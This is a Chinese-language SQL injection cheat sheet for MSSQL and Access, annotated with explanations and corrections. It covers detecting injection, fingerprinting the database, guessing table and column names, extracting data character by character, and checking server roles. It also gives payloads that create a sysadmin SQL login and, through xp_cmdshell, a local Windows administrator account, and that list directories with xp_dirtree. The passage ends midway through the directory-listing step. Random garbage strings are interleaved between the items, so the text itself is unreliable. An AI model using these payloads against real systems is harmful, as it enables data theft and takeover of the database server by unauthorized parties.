1.判断是否有注入：;and 1=1 与 ;and 1=2 —— 前者页面正常、后者页面异常（或无结果）则很可能存在注入；两者响应完全一致，说明参数未进入 SQL 或已被过滤。
2.初步判断是否是 MSSQL：;and user>0 —— MSSQL 中 user 为 nvarchar 类型，与整数 0 比较会触发类型转换错误，报错信息中会直接回显当前数据库用户名；此法依赖页面回显数据库错误，错误被屏蔽时无法判断。
Ei3zBS?J)
3.注入参数是字符型时：'and [查询条件] and ''=' —— 前导单引号闭合原语句中的字符串，末尾的 ''=' 补齐被闭合的引号，使拼接后的 SQL 仍然语法合法。
NLe}Jqp
4.搜索框（LIKE 查询）没过滤参数时：'and [查询条件] and '%25'=' —— %25 是 URL 编码后的 %，用于闭合原语句 LIKE '%...%' 中的通配符和引号。
(9mM kU=
5.判断数据库系统
;jCN
gbSt Ar.
;and (select count(*) from sysobjects)>0 —— 成立则为 MSSQL（sysobjects 是兼容性视图，SQL Server 2005 及以后也可改用 sys.objects）
o1OBwPj
;and (select count(*) from msysobjects)>0 —— 成立则为 Access（msysobjects 为 Access 系统表，默认往往对普通用户不可读，此时返回的权限错误本身也可作为 Access 的判断依据）
~;OYtz
25|8nfeC5
cj|*_}
6.猜表名：;and (select Count(*) from [表名])>0 —— 原文写作“数据库名”，但 FROM 之后跟的是表名；表存在则条件成立，不存在则报错或页面异常。
$7Mtt.d6
7.猜字段：;and (select Count(字段名) from 表名)>0 —— 字段存在则语句合法；注意 Count(字段名) 只统计非 NULL 值，字段全为 NULL 时返回 0，会被误判为字段不存在。
PS" .R_"
8.猜字段中记录长度：;and (select top 1 len(字段名) from 表名)>0 —— 把 0 逐步换成其他数值做二分比较即可确定长度；未加 order by 时 top 1 取到的行不确定，后续逐字猜解应保持相同的取行条件。
TfZ6F8|B
9.(1)猜字段的 ASCII 值（Access）
JH]K/sC>
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0 —— mid 的第二个参数为字符位置（从 1 开始），逐位改变位置并对比较值二分，即可还原整条记录。
2~p[7?sp'
(2)猜字段的 ASCII 值（MSSQL）
"?GebA
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0 —— 用 unicode() 而非 ascii()，可正确取到 nvarchar 字段中非 ASCII（如中文）字符的码点。
F{\gc|!i
10.测试权限结构（MSSQL）
0i8hI6d
oXt,e
>Dg#9
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- —— 返回 1 表示当前登录属于该服务器角色，0 表示不属于，NULL 表示角色名或登录无效；以下各条同理。
,Ci/xnI
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
UU}7U]9u
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
N(3R|Ii
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
%YlTF\-
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
VnJMmMM
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
2vKx]w
;and 1=(select IS_MEMBER('db_owner'));-- —— IS_MEMBER 检查的是当前数据库中的数据库角色，结果随当前所在库而变。
F[7x*-NO-
bT!($?GNdg
B7-RU<n
11.添加 MSSQL 和系统的帐户（需要 sysadmin 权限；下列 sp_addlogin / sp_password / sp_addsrvrolemember 均为旧版存储过程，新版本已由 CREATE LOGIN、ALTER LOGIN、ALTER SERVER ROLE 取代，但仍可用）
)06iV
;exec master.dbo.sp_addlogin username;-- —— 创建 SQL 登录；username 可不加引号直接作为 sysname 参数传入，也可写成 'username'。
;exec master.dbo.sp_password null,password,username;-- —— 参数顺序为 @old, @new, @loginame（旧密码、新密码、登录名）；原文 null,username,password 把登录名和密码写反，会把字面量 username 设为密码并对 password 这个登录报错。
N\1/JW+
;exec master.dbo.sp_addsrvrolemember username,sysadmin;-- —— 参数顺序为 @loginame, @rolename（登录名, 角色名），原文顺序写反且缺少逗号。
;<G<1+
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- —— xp_cmdshell 在 SQL Server 2005 及以后默认关闭，需先以 sysadmin 执行 sp_configure 'xp_cmdshell',1; reconfigure;；系统命令以 SQL Server 服务账户身份运行，该账户不是本地管理员时 net user /add 会失败。
Y5!b)vke
;exec master.dbo.xp_cmdshell 'net user username password /add';-- —— 上一条的精简形式，同样受 xp_cmdshell 开关和服务账户权限限制。
re,.@${H
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- —— 把新账户加入本地管理员组；非英文版 Windows 上该组名可能是本地化名称，需按目标系统调整。
vU/ D7
FX,$_:f6Y
_8h8Wtif
12.(1)遍历目录（xp_dirtree）
c8QnN:n
;create table dirs(paths varchar(100), id int) —— xp_dirtree 'c:\' 返回两列（子目录名、深度），表的列数须与之匹配；目录名超过 100 字节时插入会因截断而报错，必要时加大长度。
5>ST"l_ca
;insert dirs exec master.dbo.xp_dirtree 'c:\' —— 把目录列表写入上一步建的表；xp_dirtree 通常 public 即可执行，不依赖 xp_cmdshell。
N^elVu4 K
;and (select top 1 paths from dirs)>0 —— 把 varchar 与整数比较，利用类型转换报错回显第一条目录名；同样依赖页面回显数据库错误。
i&@,5/'-_O
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0 —— 原文末尾的 ">)" 为笔误，应为 ">0"；每回显一个目录名就把它加入 not in 列表，逐条取完为止。
LEc8NQs
8gmn6dCf
eZO9GMO
(2)遍历目录
D?+
RJs
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--